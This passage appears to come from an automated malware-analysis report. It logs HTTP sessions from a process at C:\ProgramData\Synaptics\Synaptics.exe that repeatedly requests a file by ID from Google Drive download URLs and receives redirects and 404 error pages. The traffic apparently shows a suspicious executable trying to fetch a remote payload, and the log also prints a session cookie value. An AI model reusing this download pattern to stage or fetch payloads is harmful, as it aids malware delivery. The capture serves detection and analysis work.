                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CGESiphk1iNPU1tJ_wfhyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    92192.168.2.949871142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:55 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CDN1Tvzq5TMTxAQyzpzg6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    93192.168.2.949870142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:55 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:55 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7oYeIExfFFz7ZNX2PkjYysp6pY9NwEDg0wMpFb7-uuZI8clsGofU4cAl4NjiKN6EHv
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-isOe_j6ioAJQ7WAly06a2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:55 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:55 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 63 4b 4e 32 30 30 6d 76 6d 68 46 43 5a 61 6a 6e 6c 74 5a 38 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="AcKN200mvmhFCZajnltZ8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:55 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    94192.168.2.949872142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:55 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:55 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4NwifMZmEHphfp9UN4wU4GMRE4HVThdXF3fZv-t6VSK151IgnRxXR-rLT8hFJuvr2IOnMUNxE
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Zu74I3I4jmhFTDayur7sYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:55 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:55 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 4b 69 33 64 6f 71 65 76 45 65 38 64 72 4a 7a 53 47 6a 31 56 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="6Ki3doqevEe8drJzSGj1VA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:55 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    95192.168.2.949874142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:56 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-YqgeK3KCBNJObia7XeabZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    96192.168.2.949875142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:56 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5PRMttAusoBkEsE4VNGHFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    97192.168.2.949876142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:56 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:56 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5mUzotdv3RyN70bsUnZV5ja2p9Ohzu6jggwqtSvJpnFYrQ9nv0wlw6XJwUx0nsHpXZlsOkemE
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DvN0uf_UebqjHhNxLnrnFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:56 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:56 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 65 47 5a 38 44 51 48 6c 49 66 48 46 5f 48 4b 46 38 4c 54 6b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="oeGZ8DQHlIfHF_HKF8LTkQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:56 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    98192.168.2.949877142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:56 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:56 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5n1PMPaafd9RNRz0i04F-jp51ZGFUe2IjWY6Uc6aE0XP8LvaO5ykTv3N1RAIMycw-Z
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
